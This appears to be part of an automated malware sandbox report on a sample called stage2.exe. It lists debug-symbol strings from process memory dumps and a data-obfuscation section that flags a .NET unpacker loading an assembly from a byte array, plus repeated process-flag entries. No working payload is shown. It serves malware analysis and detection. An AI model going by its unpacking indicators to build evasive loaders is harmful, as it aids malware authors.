    Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp
    Source: Binary string: .pdb! source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb6 source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb& id7 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdbF source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasman.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb4Shd source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: rasadhlp.pdbh source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb\ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: version.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb+3 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Xml.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: psapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: gpapi.pdb2 ]dd source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp
    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc.pdbn source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wuser32.pdb>Srdn source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: combase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: rsaenh.pdb@ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: arkjrukCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.477704320.00000000006E2000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: edputil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb< gd> source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp

    Data Obfuscation:

    barindex
    .NET source code contains potential unpackerShow sources
    Source: stage2.exe, Facade.cs.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.0.unpack, Facade.cs.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.1.unpack, Facade.cs.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.2.stage2.exe.ea0000.0.unpack, Facade.cs.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.2.unpack, Facade.cs.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E77471 push C033084Eh; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E773CF push C033084Eh; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E7F1A0 push eax; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07EA67E1 push es; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A327A0 push ebp; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A32780 push esp; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3273A push esp; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A667E1 push es; ret
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
